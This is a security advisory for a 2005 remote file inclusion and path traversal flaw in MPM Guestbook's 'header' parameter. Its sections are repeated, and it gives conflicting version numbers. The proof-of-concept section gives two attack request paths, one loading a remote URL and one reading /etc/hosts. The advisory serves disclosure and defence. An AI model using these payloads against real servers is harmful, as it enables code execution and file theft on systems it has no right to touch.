MPM Guestbook Header Input Validation Vulnerability
BID:12266
Info
MPM Guestbook Header Input Validation Vulnerability
| Bugtraq ID: | 12266 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2005 12:00AM |
| Updated: | Jan 14 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to SmOk3 <[email protected]>. |
| Vulnerable: |
MPM MPM Guestbook 1.5 MPM MPM Guestbook 1.2 |
| Not Vulnerable: | |
Discussion
MPM Guestbook Header Input Validation Vulnerability
MPM Guestbook is reported prone to an input validation vulnerability that may lead to remote command execution or arbitrary file content disclosure. The issue is due to a lack of sufficient sanitization performed on user-supplied 'header' URI parameter data.
An attacker may leverage this issue to execute arbitrary PHP code in the context of the web server process or disclose the contents of web server readable files.
It should be noted that although this vulnerability is reported to affect MPM Guestbook version 1.05, other versions might also be affected.
MPM Guestbook is reported prone to an input validation vulnerability that may lead to remote command execution or arbitrary file content disclosure. The issue is due to a lack of sufficient sanitization performed on user-supplied 'header' URI parameter data.
An attacker may leverage this issue to execute arbitrary PHP code in the context of the web server process or disclose the contents of web server readable files.
It should be noted that although this vulnerability is reported to affect MPM Guestbook version 1.05, other versions might also be affected.
Exploit / POC
MPM Guestbook Header Input Validation Vulnerability
The following examples are available:
PoC: /gbpro/top.php?header=http://[CMD]
PoC: /gbpro/top.php?header=../../../../../../../etc/hosts
The following examples are available:
PoC: /gbpro/top.php?header=http://[CMD]
PoC: /gbpro/top.php?header=../../../../../../../etc/hosts
Solution / Fix
MPM Guestbook Header Input Validation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MPM Guestbook Header Input Validation Vulnerability
References:
References:
- MPM Homepage (MPM)
- Remote File Include and File Disclusore (SmOk3
)